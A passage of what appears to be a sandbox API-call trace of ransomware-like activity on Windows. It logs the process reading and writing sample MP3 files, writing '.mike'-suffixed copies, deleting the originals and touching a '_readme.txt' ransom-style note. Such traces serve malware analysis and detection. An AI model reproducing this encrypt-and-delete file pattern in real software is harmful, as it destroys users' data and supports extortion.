dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.619] GetFileType (hFile=0x1c8) returned 0x1 [0160.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.619] GetFileType (hFile=0x1c8) returned 0x1 [0160.619] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x570a20 [0160.619] WriteFile (in: hFile=0x1c8, lpBuffer=0x21d5550*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x21d5550*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.620] CloseHandle (hObject=0x1c8) returned 1 [0160.620] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpFilePart=0x0) returned 0x2e [0160.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.620] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0160.620] GetFileType (hFile=0x1c8) returned 0x1 [0160.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.621] GetFileType (hFile=0x1c8) returned 0x1 [0160.621] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=5713920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x573000 [0160.621] ReadFile (in: hFile=0x1c8, lpBuffer=0x21d7f48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21d7f48*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0160.622] CloseHandle (hObject=0x1c8) returned 1 [0160.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0160.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0160.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0160.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0160.782] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=6328320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x609000 [0161.287] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=8355840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x7f8000 [0161.344] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike", lpFilePart=0x0) returned 0x33 [0161.345] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.mike", lpFilePart=0x0) returned 0x33 [0161.345] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", dwFileAttributes=0x80) returned 1 [0161.346] DeleteFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3")) returned 1 [0161.348] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\_readme.txt", lpFilePart=0x0) returned 0x2e [0161.349] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0161.350] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.mike", lpFilePart=0x0) returned 0x45 [0161.350] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpFilePart=0x0) returned 0x40 [0161.435] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=737280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xb4000 [0161.715] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=2754560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2a0800 [0161.989] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.mike", lpFilePart=0x0) returned 0x45 [0161.990] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.mike", lpFilePart=0x0) returned 0x45 [0161.990] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", dwFileAttributes=0x80) returned 1 [0161.991] DeleteFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3")) returned 1 [0161.999] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\_readme.txt", lpFilePart=0x0) returned 0x2e [0162.001] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0162.002] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mike", lpFilePart=0x0) returned 0x36 [0162.002] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", lpFilePart=0x0) returned 0x31 [0162.027] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=245760, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x3c000 [0162.337] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=2273280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x22b000 [0162.626] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=4300800, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x41a000 [0162.692] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mike", lpFilePart=0x0) returned 0x36 [0162.692] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mike", lpFilePart=0x0) returned 0x36 [0162.692] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", dwFileAttributes=0x80) returned 1 [0162.693] DeleteFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3")) returned 1 [0162.700] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\Sample Music\\_readme.txt", lpFilePart=0x0) returned 0x2e [0162.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x29d7bde0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2a407a60, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0162.702] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x284c99a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x284c99a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2973c420, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x806720, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kalimba.mp3.mike", cAlternateFileName="KALIMB~1.MIK")) returned 1 [0162.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2973c420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2973c420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x29d55c80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x3ec800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3.mike", cAlternateFileName="MAIDWI~1.MIK")) returned 1 [0162.703] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d7bde0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x29d7bde0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2a407a60, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x49e680, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3.mike", cAlternateFileName="SLEEPA~1.MIK")) returned 1 [0162.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2973c420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2973c420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2a42dbc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, 